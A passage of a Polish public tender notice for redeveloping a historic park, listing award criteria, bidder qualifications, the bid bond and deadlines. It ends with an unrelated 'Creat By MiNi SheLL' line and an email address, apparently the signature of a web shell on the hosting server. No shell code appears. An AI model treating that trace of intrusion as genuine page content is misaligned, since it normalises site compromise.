zamówienia składając pisemne oświadczenie Wykonawcy w tym przedmiocie we wskazanym terminie. W przypadku nieskorzystania z prawa opcji przez Zamawiającego Wykonawcy nie przysługują żadne roszczenia z tego tytułu.<br/>Wykonawca zobowiązany jest zrealizować zakres robót określonych w prawie opcji dla Zadania nr 3 najpóźniej w Terminie Zakończenia zamówienia podstawowego ( Zadanie nr 1 i Zadanie nr 2). W przypadku podjęcia prac w zakresie Zadania nr 3 Zamawiający oczekuje że realizacja prac dla wszystkich trzech zadań zostanie skoordynowana. <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-01-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień polegających na powtórzeniu podobnych usług/robót budowlanych, zgodnych z przedmiotem zamówienia podstawowego <br/>o których mowa w art. 214 ust. 1 pkt 7 ustawy Prawo zamówień publicznych, w wysokości nieprzekraczającej 30% wartości zamówienia podstawowego. Zamówienie zostanie udzielone na podstawie negocjacji z dotychczasowym wykonawcą, na warunkach określonych w umowie podstawowej.<br/><br/>Przewidywany zakres obejmować będzie:<br/>- budowie i przebudowie alejek spacerowych,<br/>- budowie oświetlenia parkowego,<br/>- dostawę i montaż małej architektury,<br/>- uzupełnieniu nasadzeń drzew, krzewów, rekultywacja trawników.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekty społeczne, w tym integracja zawodowa i społeczna – zatrudnienie osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta branży architektonicznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie kierownika budowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 3.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>3.1. zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3.2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie. <br/>3.3.	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże że dysponuje środkami finansowymi lub posiada zdolność kredytową na kwotę 700 000,00 PLN.<br/>3.3.1.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia mogą oni łącznie wykazać spełnianie powyższego warunku. <br/>3.4.	zdolności technicznej lub zawodowej:<br/>3.4.1.	posiadają wiedzę i doświadczenie tj.:<br/>3.4.1.1. w okresie ostatnich 5 (pięciu) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie dwie dokumentacje projektowe z których każda obejmowała swoim zakresem zagospodarowanie parku/skweru/terenu użyteczności publicznej o powierzchni minimum 1 000 m2 <br/>3.4.1.2.	w okresie ostatnich 5 (pięciu) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał co najmniej: <br/>- jedną usługę o wartości minimum 200 000,00 PLN brutto, bądź dwie usługi o łącznej wartości minimum 200 000,00 PLN brutto, polegającą/ce na nasadzeniach i pielęgnacji drzew w parkach/skwerach/terenach użyteczności publicznej.<br/>3.4.1.3.	w okresie ostatnich 5 (pięciu) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał co najmniej: <br/>- jedną robotę budowlaną o wartości nie mniejszej niż 500 000,00 zł brutto, w zakresie zrealizowania prac polegających na zagospodarowaniu parku/skweru/terenu użyteczności publicznej obejmujących m.in., budowę/przebudowę/remont chodników/alejek, remont/budowę/przebudowę oświetlenia <br/>3.4.3.	dysponują osobami zdolnymi do wykonania zamówienia tj.: <br/>3.4.3.1.	jedną osobą, która będzie pełniła funkcję projektanta branży drogowej <br/>posiadającą uprawnienia budowlane do projektowania w specjalności inżynieryjnej drogowej<br/>3.4.3.2. jedną osobą, która będzie pełniła funkcję projektanta branży elektrycznej posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.<br/>3.4.3.3. jedną osobą, która będzie pełniła funkcję projektanta branży sanitarnej posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych.<br/>3.4.3.4. jedną osoba, która będzie pełniła funkcję projektanta branży architektonicznej posiadającą uprawnienia budowlane do projektowania w specjalności architektonicznej bez ograniczeń, która sporządziła dwie dokumentacje projektowe, z których każda obejmowała swoim zakresem zagospodarowanie parku/skweru/terenu użyteczności publicznej o powierzchni minimum 1 000 m2.<br/>3.4.3.5. jedną osobą, która będzie pełniła funkcję kierownika budowy przy realizacji niniejszego zamówienia, posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej bez ograniczeń oraz min. 5 letnie doświadczenie zawodowe w pełnieniu funkcji kierownika budowy obejmującej swoim zakresem roboty drogowe wraz z infrastrukturą podziemną (wod-kan, teletechniczną, elektroenergetyczną), która pełniła funkcję Kierownika budowy przy realizacji dwóch robót budowlanych, z których każda obejmowała swoim zakresem zagospodarowanie parku/skweru/terenu użyteczności publicznej, obejmującą budowę/przebudowę/remont chodników/alejek oraz budowę/przebudowę/remont oświetlenia.<br/>3.4.3.6.	jedną osobą, która będzie pełniła funkcję kierownika zieleni nadzorującą prace w zakresie zieleni w parku zabytkowym, spełniającą warunki określone w art. 37b ust.1 Ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami<br/>3.4.3.7.	dwie osoby, które będą pełniły funkcje pracowników technicznych <br/>do wykonywania prac o charakterze technicznym przy zieleni w parku zabytkowym, spełniającymi warunki określone w art. 37b ust. 3 Ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami.<br/>3.4.3.8.	jedną osobą z wykształceniem wyższym ogrodniczym lub w zakresie architektury krajobrazu z min. 2 letnim doświadczeniem w zakresie wykonawstwa w dziedzinie architektury krajobrazu <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)	Oświadczenie o aktualności informacji zawartych w oświadczeniu <br/>o niepodleganiu wykluczeniu (wzór) – wg zał. nr 10 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">b)	Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty – wg zał. nr 11 do SWZ (wzór);<br/><br/>Uwaga!<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonywanych wspólnie z innymi wykonawcami, wówczas w powyższym wykazie robót budowlanych zobowiązany jest podać jedynie te roboty budowlane w których wykonaniu wykonawca ten bezpośrednio uczestniczył.<br/>c)	Wykaz usług wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich przedmiotu, wartości, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy – wg zał. nr 12 do SWZ (wzór);<br/>d)	Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – wg zał. nr 13 do SWZ (wzór).<br/><br/>e) Informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.<br/><br/>Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć wymaganego przez Zamawiającego podmiotowego środka dowodowego, o którym mowa w pkt e), składa inny podmiotowy środek dowodowy (inny dokument), który w wystarczający sposób potwierdza spełnianie opisanego przez Zamawiającego warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej lub finansowej.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wymagania dotyczące wadium:<br/>a)	Przystępując do postępowania wykonawca zobowiązany jest wnieść wadium w wysokości: 230 000,00 zł (słownie złotych: dwieście trzydzieści tysięcy 00/100).<br/>Wadium należy wnieść przed upływem terminu składania ofert.<br/>b)	Wadium może być wnoszone w pieniądzu, gwarancjach bankowych, gwarancjach ubezpieczeniowych i poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>c)	Wadium wnoszone w pieniądzu należy przelać na rachunek bankowy prowadzącego postepowanie w GETIN Bank w Łodzi, nr konta: 29 1560 0013 2002 2020 4000 0013.<br/>d)	Za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania rachunku bankowego zamawiającego.<br/>e)	Wadium wnoszone w formie innej niż pieniężna musi być wniesione w oryginale w postaci elektronicznej i musi obejmować cały okres związania ofertą. Gwarancja lub poręczenie musi zawierać w swojej treści nieodwołalne i bezwarunkowe zobowiązane wystawcy dokumentu do zapłaty na rzecz Zamawiającego kwoty wadium płatne na pierwsze pisemne żądanie Zamawiającego. Wadium należy załączyć do zaszyfrowanej zgodnie <br/>z zapisami rozdziału VIII pkt. 1 SWZ oferty wykonawcy.<br/>f)	Dokument, o którym mowa w lit. e) musi być podpisany podpisem elektronicznym przez gwaranta/ poręczyciela<br/>g)	Zwrot wadium nastąpi zgodnie z art. 98 Pzp.<br/>h)	Zamawiający zatrzyma wadium zgodnie z zasadami określonymi w art. 98 ust. 6 Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2. W toku prowadzonego postępowania komunikacja pomiędzy zamawiającym a wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia następować będzie za pośrednictwem lidera (pełnomocnika), o którym mowa w pkt. 1 w rozdziale V SWZ.<br/>3. Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia zawarte są w rozdziale V SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z wzorem Umowy stanowiącym załącznik nr 4 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-29 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-29 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-28</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Termin wykonania zamówienia: <br/><br/>Dla Zadania 1, Zadania 2 i Zadania 3 ( w przypadku skorzystania przez Zamawiającego z prawa opcji w zakresie Zadania 3) Termin Zakończenia Realizacji Inwestycji Strony ustalają do dnia 31.01.2023 r., z tym że Wykonawca zobowiązany jest do przekazania Zamawiającemu Dokumentacji Projektowej niezbędnej do Zgłoszenia robót budowlanych oraz dokonania takiego zgłoszenia, Projektu/ów Budowlanego/ych wraz z ostateczną/ymi decyzją/ami o pozwoleniu na budowę (o ile będzie/będą wymagane) oraz do przekazania Projektu/ów Wykonawczego/ych w terminie 9 miesięcy (słownie: dziewięciu miesięcy) od dnia zawarcia Umowy. <br/><br/>2. Na kryterium „Cena” składają się dwa podkryteria:<br/>- podkryterium „Cena zamówienia podstawowego” (waga 50%)<br/>- podkryterium „Cena opcji” (waga 10%)

Creat By MiNi SheLL
Email: jattceo@gmail.com